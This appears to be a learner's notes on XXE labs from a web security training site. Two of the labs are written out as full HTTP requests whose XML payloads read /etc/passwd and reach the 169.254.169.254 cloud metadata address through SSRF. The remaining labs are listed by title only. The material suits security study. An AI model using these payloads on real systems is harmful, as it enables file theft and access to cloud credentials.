labs
Lab - 1: Exploiting XXE using external entities to retrieve files (A)
POST /product/stock HTTP/1.1
...
Referer: https://0aef009d032939ebc0db06e7004100cc.web-security-academy.net/product?productId=1
...
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe; </productId><storeId>1</storeId></stockCheck>Lab - 2: Exploiting XXE to perform SSRF attacks (A)
POST /product/stock HTTP/1.1
...
Referer: https://0a40003e04c7970fc0d988b500d80014.web-security-academy.net/product?productId=1
...
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>Lab - 3: Blind XXE with out-of-band interaction (P)
Lab - 4: Blind XXE with out-of-band interaction via XML parameter entities (P)
Lab - 5: Exploiting blind XXE to exfiltrate data using a malicious external DTD (P)
Lab - 6: Exploiting blind XXE to retrieve data via error messages (P)
Lab - 7: Exploiting XXE to retrieve data by repurposing a local DTD (E)
Lab - 8: Exploiting XInclude to retrieve files (P)
Lab - 9: Exploiting XXE via image file upload
Last updated